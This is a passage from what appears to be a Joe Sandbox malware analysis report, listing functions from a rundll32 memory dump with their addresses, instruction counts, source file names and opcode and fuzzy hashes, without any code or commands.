                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 225e6520c3b6bc0ecc245979e4851b6c9e573cfdafaf9b7c714bd8ebfac77630
                                                                                                                                                                                                                                                                            • Instruction ID: 7863923ff3900f71abf388ecf8e3e256ace430d17f8b0cbb9c6ccdbd87bffb50
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 225e6520c3b6bc0ecc245979e4851b6c9e573cfdafaf9b7c714bd8ebfac77630
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 230121B4E00208AFDB44EFB9E45159CBBB1EF49205B1085D9D404AB245EA71BE0A8F41
                                                                                                                                                                                                                                                                            Function 04AC6769 Relevance: .0, Instructions: 41COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 45b3ca44159501ebaf4c1006e65eca57e10449cd76bd1661ba7d87641d9ce33b
                                                                                                                                                                                                                                                                            • Instruction ID: 23d549a7f047538fdbe314aba753e9ade73566990ba99f369acedc97719ae527
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 45b3ca44159501ebaf4c1006e65eca57e10449cd76bd1661ba7d87641d9ce33b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 25018F75B01600EBDB10CF68C68066DF7E2FB88325B608A3DC0169B244DB31EC45CB80
                                                                                                                                                                                                                                                                            Function 04ACE3EB Relevance: .0, Instructions: 41COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 4e880042fb6fa8053edeac0b1c6c3b1acc89d89ea9a5504ee0d1b45811869bb6
                                                                                                                                                                                                                                                                            • Instruction ID: 92607631548fc28815a3df0bc19774097ee6981e1a2a0b87c055a4e60040b360
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4e880042fb6fa8053edeac0b1c6c3b1acc89d89ea9a5504ee0d1b45811869bb6
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AF01F436B103108BE7159B98D8523BEB767FBC8350F54845AEA056B380DF70BD0A8BD1
                                                                                                                                                                                                                                                                            Function 04ACE36A Relevance: .0, Instructions: 40COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 9c3800dd2f6ced4e04b200079b7d163b1962c996cd6fe552b2cf9514f3c9c737
                                                                                                                                                                                                                                                                            • Instruction ID: d6bc9463152f418d2666f650f1442e66af0d2285737a7c85950727a5b693a2b9
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9c3800dd2f6ced4e04b200079b7d163b1962c996cd6fe552b2cf9514f3c9c737
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0CF0C837B503104BEB15975898523BE7367FBC8650F55849AE9056B380DF70BD068BD1
                                                                                                                                                                                                                                                                            Function 04ACAF00 Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 09ccf5451ce826cd11c131e7d77e1fa5f34ec76214c4492316f380d040d7a6c2
                                                                                                                                                                                                                                                                            • Instruction ID: 405327a26518829d7364f1262478c6816954978b94bdbaf254edda1632fc2faa
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 09ccf5451ce826cd11c131e7d77e1fa5f34ec76214c4492316f380d040d7a6c2
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 08F027F2B002051FE764476A68C49ABABEAEFD9164314802AF80DC7301FD60DC0343A0
                                                                                                                                                                                                                                                                            Function 04AC576F Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 80570c43a7c278b59bd4fae2c04c767badaabe4360faef6e4b0427f2b9e27925
                                                                                                                                                                                                                                                                            • Instruction ID: c9130d172da521ef43ef4e8a9c7b0502aaa0efc5bf1358502a0309da8ca21452
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 80570c43a7c278b59bd4fae2c04c767badaabe4360faef6e4b0427f2b9e27925
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 36F0E277B40A109FF721AA5AE4406D97791EF85228304D42EE08A8B615DA60BC8B8B54
                                                                                                                                                                                                                                                                            Function 04AC4551 Relevance: .0, Instructions: 38COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 655b6905ba891b6236f8d9a209c9e5ad7edae3af57f9b43aa08fa4efcf034d9a
                                                                                                                                                                                                                                                                            • Instruction ID: 77b8e65210e03dc182a5a49044f8d5b6a5760c04192aea8afef12b6dda8d0287
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 655b6905ba891b6236f8d9a209c9e5ad7edae3af57f9b43aa08fa4efcf034d9a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 86F02E357047041FE3166369A85144E7F96DEC515530080FEE40D9F341DE24FC0B8796
                                                                                                                                                                                                                                                                            Function 04AC56D0 Relevance: .0, Instructions: 38COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: fb0a689a6d4df43492981ca12bb3ebcd93d3fe830a02dc1d172482f4c763125b
                                                                                                                                                                                                                                                                            • Instruction ID: 8faaf373c978949ec4fa410ede593a5ce7f9dff12361a431ded58c80e4351e17
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fb0a689a6d4df43492981ca12bb3ebcd93d3fe830a02dc1d172482f4c763125b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C5F0C231B003057BE734A7AAD44066EBBD6EBC0316740856DE10A9B740CFB5BC0E8BE1
                                                                                                                                                                                                                                                                            Function 04AC67F0 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 1f220657157439a357618d0a06bbe4770c158e48c6a26eaace359d49beacc104
                                                                                                                                                                                                                                                                            • Instruction ID: a62266f01aa365c7d9aaba51d50ce65b817e142f577a2ceef56f5acb4922d384
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1f220657157439a357618d0a06bbe4770c158e48c6a26eaace359d49beacc104
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DC0112B0E00308EFDF44EFA9E54159DBBB6EF89205B1085D9E404A7344DE707E058F51
                                                                                                                                                                                                                                                                            Function 04AC57A8 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: f6c56cb8d94200978ee85bab8f32d9eab88a201da100d86d8939b9937914c880
                                                                                                                                                                                                                                                                            • Instruction ID: 5eb7562465d70a76b03d711f4a8ad4049e6760b9177fa7acf1c0cad9d39e302e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f6c56cb8d94200978ee85bab8f32d9eab88a201da100d86d8939b9937914c880
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 65F0E2347043105FE721D73AD851E5A7BD6EFCA26470849AEE544CF252EB60FC06D790
                                                                                                                                                                                                                                                                            Function 04AC38B0 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: fdfe843285ff4b7a696b9820610c41d9dd3c1688a43b48d42d744a04bf2bc206
                                                                                                                                                                                                                                                                            • Instruction ID: f0d83ce18ea6cd399ed28a0fffa8562d91795e8d4416b09369627c8d4a478493
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fdfe843285ff4b7a696b9820610c41d9dd3c1688a43b48d42d744a04bf2bc206
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A0F0E5207492580EFF6026A85AA039E1F8C8B4675CF11C07ECC81CAA83D9C0F88683D1
                                                                                                                                                                                                                                                                            Function 04AC45B8 Relevance: .0, Instructions: 34COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 6727144f1001e34d9c811ae24bf2d5da235feed8c1ce95a30e38604b6e7b59f2
                                                                                                                                                                                                                                                                            • Instruction ID: eda204d83eb34a4068f9140b9228fe59e972dbdcc6b994e6ff7043ab27aeb3d4
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6727144f1001e34d9c811ae24bf2d5da235feed8c1ce95a30e38604b6e7b59f2
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FAF0E2347043018FEB20DB3DE85496E3BE2DFC920534445AEE409CF266DA20FC078B51
                                                                                                                                                                                                                                                                            Function 04AC68D1 Relevance: .0, Instructions: 34COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: ccb59b25496428a16a531c4ddf975d4e6adf348027a9b96b6f07ba597cf68bb2
                                                                                                                                                                                                                                                                            • Instruction ID: 83b188e7ede1e44c542d9623b65669dede398f255f3f5f39d4440339e1860fd8
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ccb59b25496428a16a531c4ddf975d4e6adf348027a9b96b6f07ba597cf68bb2
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7CF05476A04155AFDB12CF59D44498EBFF5EF8931030981EBE558CB252DB31E905CF50
                                                                                                                                                                                                                                                                            Function 04ACC688 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: b0bfba0659fb33f597dd740a8c7f5c06b13ae5d51b703154c3fd7aae7be4d094
                                                                                                                                                                                                                                                                            • Instruction ID: 77a0b87d4b0687d4ca6f00b44579a7086513f15d1e8238a98c364bed3b9ae3e7
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b0bfba0659fb33f597dd740a8c7f5c06b13ae5d51b703154c3fd7aae7be4d094
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6BF0A0367003114BD758DB75D900566F39AAF892A070891B9EA08C7320EE71E8438780
                                                                                                                                                                                                                                                                            Function 04ACC4C9 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 51560be5a75bc4fb329cb3487ef777fbbfdf836cb0018fa452ad0f4f5a68bcda
                                                                                                                                                                                                                                                                            • Instruction ID: f3384f2e52134086e5f34def0b8181d7596d8fdfd5b6c6a81ce47c102791a062
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 51560be5a75bc4fb329cb3487ef777fbbfdf836cb0018fa452ad0f4f5a68bcda
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 57F05C373443805FE7339B2458406AF7BB1CFC576071486EED88E8B446EDA0F94A8391
                                                                                                                                                                                                                                                                            Function 04ACAB90 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 707572305aa143b02bff51a22ed47608a84edee48e98a09107ccc30817216a5a
                                                                                                                                                                                                                                                                            • Instruction ID: ce232e7ddc2ef5baca1159dd6da8b0562d9fe7384e86078288e7a8c6308e07e3
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 707572305aa143b02bff51a22ed47608a84edee48e98a09107ccc30817216a5a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 27E02B313042045FD7148A3AAC85A6A7BFAEBC962171480BEF50EC7361DD20EC068750
                                                                                                                                                                                                                                                                            Function 04AC1431 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: e107b50d512e2b31c07f46b2dfeaac6b47dca5547ec3be6ef5b738d9da91b496
                                                                                                                                                                                                                                                                            • Instruction ID: d625b4935f0cdd0c06a8d149a97bf235a60c52e698716bf367e69f06bd7db2da
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e107b50d512e2b31c07f46b2dfeaac6b47dca5547ec3be6ef5b738d9da91b496
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B9F0B470F043055FFB499F7861653267FAAEFD1201705087DCD4ACF285EA24E9468BC1
                                                                                                                                                                                                                                                                            Function 04AC36A9 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: f0fc753f231a3fee0bc207c01ade54b1c247e5d5edb528d827f9964049bfc1fa
                                                                                                                                                                                                                                                                            • Instruction ID: e217aa240cc8b7951f1e971c43e3d6bf30d648e57f38487adc7956e98ed5d2bf
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f0fc753f231a3fee0bc207c01ade54b1c247e5d5edb528d827f9964049bfc1fa
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3CE06D71E801159F9F84DEB999412EEBBF4DA48154B30C46EDC0AD7240E370E60B9BC0
                                                                                                                                                                                                                                                                            Function 04AC4560 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 8a47c83161853a7d61e56bc7c941335c8f6a324012ad637f3382389723a2f05b
                                                                                                                                                                                                                                                                            • Instruction ID: c07ff7b0e5ba9854017d2905af5fc2c739a4c49a365210e70c7c566e1d55d803
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8a47c83161853a7d61e56bc7c941335c8f6a324012ad637f3382389723a2f05b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FEE02B32700604179629A76AA41051EBB97DFC926534084BDE10D9B300DE24FC0947D9
                                                                                                                                                                                                                                                                            Function 04AC6AAF Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 53e0d4f6bb9da3c2feec5814b9fbf9d9bbbae75d2ae59b7428aee0ac55452877
                                                                                                                                                                                                                                                                            • Instruction ID: 4542a56324e7b4287a568394c4563fc385055cd398a92b006642611d3009ce58
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 53e0d4f6bb9da3c2feec5814b9fbf9d9bbbae75d2ae59b7428aee0ac55452877
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 35F06D753082449FE311CF69D880CD27BE8AF5921835980AAE888CF353D761FD16CB90
                                                                                                                                                                                                                                                                            Function 04ACC1D0 Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 44218ff595726064686d867b13d469eb59ebdbe7eb6be88cee7b603c037cc839
                                                                                                                                                                                                                                                                            • Instruction ID: 23c5bd846a0f5892ea3c38e4ab94233baf6e70cc09d0eb4de983c8bcf46cba63
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 44218ff595726064686d867b13d469eb59ebdbe7eb6be88cee7b603c037cc839
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 41E06F362013041FD3006728A4490AE3FAAEBCA368B05406AF88283351CE34BC0A8FE1
                                                                                                                                                                                                                                                                            Function 04AC3CC0 Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 0bd6e2c7ccfc0d98683be0d70343164b3e5bb8d5997c85e7e364eebc222909b6
                                                                                                                                                                                                                                                                            • Instruction ID: 3da349389e6cd5ffc63b3dddf586854977604a54332819a5604496b98181f126
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0bd6e2c7ccfc0d98683be0d70343164b3e5bb8d5997c85e7e364eebc222909b6
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 35E07D367481B04F8B1112AF342147D3BAFCAC6E6330940AFE408C3383CE16AC0B1792
                                                                                                                                                                                                                                                                            Function 04ACC678 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 9d3543a5f20fc65f468c7e0dd234cb708e27f0d9f62e7e5e6d992cd9eb111c27
                                                                                                                                                                                                                                                                            • Instruction ID: f2047d433a096a274b1b24a96ce77e2f53235301901a85cf3601474db8259077
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9d3543a5f20fc65f468c7e0dd234cb708e27f0d9f62e7e5e6d992cd9eb111c27
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 82E02636A043120BE31957349845191FFAADF423A4B08D5A6DD0886256EE30D843C780
                                                                                                                                                                                                                                                                            Function 04ACCAC0 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
